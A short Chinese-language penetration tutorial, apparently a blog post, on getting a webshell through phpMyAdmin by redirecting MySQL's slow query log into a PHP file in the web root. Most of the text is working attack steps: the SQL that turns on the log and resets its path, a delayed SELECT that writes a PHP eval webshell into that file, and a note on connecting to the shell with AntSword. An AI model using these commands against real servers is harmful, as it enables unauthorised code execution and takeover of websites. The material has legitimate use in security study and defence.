phpmyadmin通过慢查询日志getshell连载(二)

这是phpmyadmin系列渗透思路的第二篇文章，前面一篇文章阐述了通过全局日志getshell，但是还有一个日志可以getshell，那就是本次实验的慢查询日志，操作类似，毕竟实战中多一条路就多一次成功的机会

1、查看当前慢查询日志目录

show variables like '%slow%';

 

 

2、开启慢查询日志功能

set global slow_query_log=on;

 

 

3、重新设置日志路径

set global slow_query_log_file='E:/phpStudy/PHPTutorial/WWW/xx.php';

 

4、再次查看日志路径，看到已经被成功修改了

 

5、执行sql命令，写webshell进日志文件

注意执行的sql语句有一个sleep的延时时间，我这里设置为10s，为什么要加这个延时呢，通过标题知道时"慢查询日志getshell"，图片貌似当初是不行的，尽量设置高一点的延时-.-

select '<?php eval($_POST[cmd]);?>' from mysql.db where sleep(10);

 

6、直接上蚁剑连接webshell即可

 

执行命令：成功！

 

 

整体过程与全局日志思路一致，还是挺简单的，多试试就好，希望对大家有所帮助，哈哈...